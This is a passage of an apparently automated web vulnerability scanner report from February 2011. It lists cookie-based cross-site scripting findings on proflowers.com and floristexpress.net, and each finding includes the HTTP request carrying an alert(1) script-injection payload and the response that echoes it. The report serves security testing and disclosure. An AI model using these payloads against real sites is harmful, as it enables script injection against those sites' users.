Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:59:25 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:59:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:59:25 GMT
Content-Length: 155561


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Product";
resx.links="30007357;30007828;41213;30043943;30050119;";
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

2.118. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/A-Valentines-Romance-30046586

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8f0f</script><script>alert(1)</script>745aa2b3095 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/A-Valentines-Romance-30046586 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84fa8f0f</script><script>alert(1)</script>745aa2b3095; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30046586&2/11/2011 2:35:24 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:24 GMT
Connection: close
Content-Length: 153216


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
t";
resx.links="30046586;30002134;40802;30007219;40753;30050119;";
resx.itemid = "30046586";
resx.qty="1";
resx.price="99.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84fa8f0f</script><script>alert(1)</script>745aa2b3095";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.119. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdc34</script><script>alert(1)</script>5e638967398 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84ffdc34</script><script>alert(1)</script>5e638967398; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?40752&2/11/2011 2:35:40 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:40 GMT
Connection: close
Content-Length: 146237


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
uct";
resx.links="40752;30046428;30006291;40753;30046428;30050119;";
resx.itemid = "40752";
resx.qty="1";
resx.price="119.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84ffdc34</script><script>alert(1)</script>5e638967398";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.120. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Valentines-Day-Bouquet-30045703

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d481f</script><script>alert(1)</script>4377d2f310b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/Valentines-Day-Bouquet-30045703 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84fd481f</script><script>alert(1)</script>4377d2f310b; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30045703&2/11/2011 2:36:13 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:36:13 GMT
Connection: close
Content-Length: 157725


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.links="30045703;43633;30046586;42846;30046427;5519;30050119;";
resx.itemid = "30045703";
resx.qty="1";
resx.price="59.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84fd481f</script><script>alert(1)</script>4377d2f310b";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.121. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/Two-Dozen-Long-Stemmed-Red-Roses-504

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 249f3</script><script>alert(1)</script>731f6b5159e was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /roses/Two-Dozen-Long-Stemmed-Red-Roses-504 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f249f3</script><script>alert(1)</script>731f6b5159e; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?504&2/11/2011 2:35:47 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:47 GMT
Connection: close
Content-Length: 158411


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ct";
resx.links="504;30007219;30050091;40753;42211;30004718;30050119;";
resx.itemid = "504";
resx.qty="1";
resx.price="99.97";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f249f3</script><script>alert(1)</script>731f6b5159e";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.122. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Rainbow-Valentines-Tulips-426

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 619cf</script><script>alert(1)</script>3a90e1866c4 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tulips/20-Rainbow-Valentines-Tulips-426 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f619cf</script><script>alert(1)</script>3a90e1866c4; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?426&2/11/2011 2:35:03 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:02 GMT
Connection: close
Content-Length: 157772


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
sx.event="Product";
resx.links="426;3669;30007691;3669;5395;30050119;";
resx.itemid = "426";
resx.qty="1";
resx.price="24.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f619cf</script><script>alert(1)</script>3a90e1866c4";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.123. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Sweetheart-Tulips-2744

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8ee6</script><script>alert(1)</script>03259a5beb5 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tulips/20-Sweetheart-Tulips-2744 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84fa8ee6</script><script>alert(1)</script>03259a5beb5; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?2744&2/11/2011 2:36:50 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:36:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:36:50 GMT
Connection: close
Content-Length: 155088


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.event="Product";
resx.links="2744;30007493;41213;30043943;30050119;";
resx.itemid = "2744";
resx.qty="1";
resx.price="19.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84fa8ee6</script><script>alert(1)</script>03259a5beb5";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.124. http://www.floristexpress.net/ [ref_code cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92ec"%3balert(1)//fcbdf6b6cb5 was submitted in the ref_code cookie. This input was echoed as b92ec";alert(1)//fcbdf6b6cb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=b92ec"%3balert(1)//fcbdf6b6cb5;

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d33655c5e56ac1139ebc9ff939004443; path=/
Connection: close
Content-Type: text/html
Content-Length: 103496

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
";
s.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="A";
s.eVar36="b92ec";alert(1)//fcbdf6b6cb5";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.125. http://www.floristexpress.net/ [ref_code cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the ref_code cookie is copied into a JavaScript rest-of-line comment. The payload abe49%0aalert(1)//1152c45c4d5 was submitted in the ref_code cookie. This input was echoed as abe49
alert(1)//1152c45c4d5
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950abe49%0aalert(1)//1152c45c4d5;

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a96375ccee03b7060086e4761bd98a01; path=/
Connection: close
Content-Type: text/html
Content-Length: 103526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
Var14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="B";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950abe49
alert(1)//1152c45c4d5
";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.126. http://www.floristexpress.net/comeback.htm [ref_code cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
